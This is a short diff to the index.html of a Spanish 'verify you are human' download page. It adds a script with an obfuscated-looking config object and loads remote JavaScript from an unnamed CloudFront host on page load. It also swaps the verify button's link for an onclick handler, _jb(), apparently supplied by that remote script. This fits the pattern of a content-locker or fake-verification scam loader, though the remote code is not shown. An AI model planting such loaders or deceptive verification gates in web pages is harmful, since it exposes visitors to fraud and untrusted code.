--- a/index.html
+++ b/index.html
@@ -22,7 +22,10 @@
 <link href="css/mana.css" rel="stylesheet">
 
 
-
+<script type="text/javascript">
+    var kDHQq_wQX_daatKc={"it":4211788,"key":"00fad"};
+</script>
+<script src="https://d15skjf5hy9xr6.cloudfront.net/381568f.js"></script>
 
 
 </head>
@@ -125,9 +128,9 @@
 <p>¡Estas casi listo! Complete este paso final haciendo clic en el botón a continuación y siga todas las instrucciones indicadas para verificar que es un ser humano.</p>
 <div id="spiner" class="fas fa-spinner fa-spin"></div>
 
-<a href="https://t.co/qYOlZAjvUS" target="_blank">
-<div id="b-1"  class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>verifica ahora</span></div>
-</a>
+
+<div id="b-1" onclick="_jb()" class="button animated pulse infinite"><span class="lnr lnr-download"></span><span>verifica ahora</span></div>
+
 </div>
 </div>
 </div>
